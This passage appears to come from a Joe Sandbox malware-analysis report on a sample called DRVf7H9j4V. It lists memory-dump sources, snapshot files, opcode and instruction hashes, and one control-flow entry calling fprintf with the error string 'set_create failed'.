                                • Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dc52a87cc3c63a60bc39f2f89282fa35bd7c198f43a4f5a7275982faea7101c2
                                • Instruction ID: 18b18c78ea57e2933f785eb98fb0eed2e6e3ba4ae975db3f4b5666646386f11a
                                • Opcode Fuzzy Hash: dc52a87cc3c63a60bc39f2f89282fa35bd7c198f43a4f5a7275982faea7101c2
                                • Instruction Fuzzy Hash: BA317A7110D7D46AC3229B748A898A3FF69FE4375432911EFD0C11F0B3D26AA812C39A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 42d2b652937673e1029f448e2087c4e9ac9b0e27a5ffeb98a6424e93d54e0f3d
                                • Instruction ID: 2d10ade6e87be67a499cb207e5ebd46864f414385da39928dcdaeebba1b7a316
                                • Opcode Fuzzy Hash: 42d2b652937673e1029f448e2087c4e9ac9b0e27a5ffeb98a6424e93d54e0f3d
                                • Instruction Fuzzy Hash: 643157B690E3C49FCB028F3488E46D5BF74EF97218B5942DAD484AB0A3C338A546C759
                                Memory Dump Source
                                • Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9c6c21b50467ac891439f28963d3b685e07f632f728d59d2fd0032456406df1a
                                • Instruction ID: 832121b05858ae4075cb9f681042bbcfc365b3e5eb6dab71abeab49b36f88987
                                • Opcode Fuzzy Hash: 9c6c21b50467ac891439f28963d3b685e07f632f728d59d2fd0032456406df1a
                                • Instruction Fuzzy Hash: 41215B318183586BDB118E399D45F57FFBCFB43720F400669E990B71D2CA65E8018768
                                Memory Dump Source
                                • Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a81bc39c1367242cb9ff8046315148dc1a9e5dd8e24598f1063b759c56dd32f0
                                • Instruction ID: bf6761084c7165da02145a9ae339b24aac8a25a749fca72c0697e3754ca11673
                                • Opcode Fuzzy Hash: a81bc39c1367242cb9ff8046315148dc1a9e5dd8e24598f1063b759c56dd32f0
                                • Instruction Fuzzy Hash: B12127716092959FC706CF64D8819D2BBB4EF06320B0843DED5909F293E7389806CB96
                                Memory Dump Source
                                • Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f5a53422ff17af1b030cf4cb7388a167bcebdceea0aac70cde12f0aa1d7cbe07
                                • Instruction ID: 4acf59eda68d288d153774ea87955d9bc959ecf303e0018fc29d7d30a4288bf0
                                • Opcode Fuzzy Hash: f5a53422ff17af1b030cf4cb7388a167bcebdceea0aac70cde12f0aa1d7cbe07
                                • Instruction Fuzzy Hash: 44F0A475A05344AFCB209E3CD845CE7BBBDEFC7314B14655AE9847B257C7309806C6A8
                                Memory Dump Source
                                • Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ce153e37285b3a502b17d5c365f3adf43ec6aa6430d9ed28b91f4e7dc34483f6
                                • Instruction ID: 4076726633fc522666fe6305210414c854a45d5866a2e46fb70afbfe4056e306
                                • Opcode Fuzzy Hash: ce153e37285b3a502b17d5c365f3adf43ec6aa6430d9ed28b91f4e7dc34483f6
                                • Instruction Fuzzy Hash: 61F02875905344AFC7209E2CD845CE7BBBDEFC7314B10556AE9883B253C7309806C7A8
                                Memory Dump Source
                                • Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a4e0ad9198eb5c1b284a6f80c5c862e243cbbb5c467be9c188b8dc755b78a15e
                                • Instruction ID: 8d9b7f51adfe17281d33351e5bd71aa19983913d49cc1454ae8e100fb7e94daf
                                • Opcode Fuzzy Hash: a4e0ad9198eb5c1b284a6f80c5c862e243cbbb5c467be9c188b8dc755b78a15e
                                • Instruction Fuzzy Hash: C3F0F475905344ABC7209E2CD885CE7BBBDEEC7318B10556AD5C87B252C7209806C6A8
                                Memory Dump Source
                                • Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eb9967b8556e794a9bd5e9e2a12564930d7f2ea8e6b4b7565bfd44721fc0540c
                                • Instruction ID: 60d4b24447f7b6db8eba9a70e2ece41cf9972fb0edf89557d6f7cd30f95d2c67
                                • Opcode Fuzzy Hash: eb9967b8556e794a9bd5e9e2a12564930d7f2ea8e6b4b7565bfd44721fc0540c
                                • Instruction Fuzzy Hash: 720149343052005BC704EF38DC868B9B764DB8631170404BFED81DF397F93168158755
                                Memory Dump Source
                                • Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 998537bebf3df387600a4f5ce979183f4faa302e6148d20c62b78e20c66a059d
                                • Instruction ID: 54e5996617a3696a73d93199fbd6d979a88b765fae2e81e01a6bf4a73d12fb57
                                • Opcode Fuzzy Hash: 998537bebf3df387600a4f5ce979183f4faa302e6148d20c62b78e20c66a059d
                                • Instruction Fuzzy Hash: 2DF0F4756047646FCA26DE15CC85F47FB79FF8B704B40044DF2847B282C674A800CBA8
                                Memory Dump Source
                                • Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a7bba05c9be66f63acd2d053c66d9af438cf0f59c943dccb46faad187e40003e
                                • Instruction ID: 012a05fdb79da3ba267b4d97f6a7705f8dda8a7538b40e7117cdab0935253095
                                • Opcode Fuzzy Hash: a7bba05c9be66f63acd2d053c66d9af438cf0f59c943dccb46faad187e40003e
                                • Instruction Fuzzy Hash: 8CE08679D023486BC7118D68D481473FB79EE9B215F146555AD847B706C335D801C7A8

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 274 403d4d-403d7a call 4086e0 fprintf
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd
                                Yara matches
                                Similarity
                                • API ID: fprintf
                                • String ID: 4d (longest request)$set_create failed
                                • API String ID: 383729395-678042608
                                • Opcode ID: e3d3552cbd16f34401e802826dc6a2e5690c2284a07ca8e29708c3f171f6230e
                                • Instruction ID: dbbaa142c143b26e99e35478be6cea228a70e21e9318d155f1f20dd67b8751d0
                                • Opcode Fuzzy Hash: e3d3552cbd16f34401e802826dc6a2e5690c2284a07ca8e29708c3f171f6230e
                                • Instruction Fuzzy Hash: CCD023B39440007BD100E7EC6C46A2437C466081157410372F808F22D1C432505C862D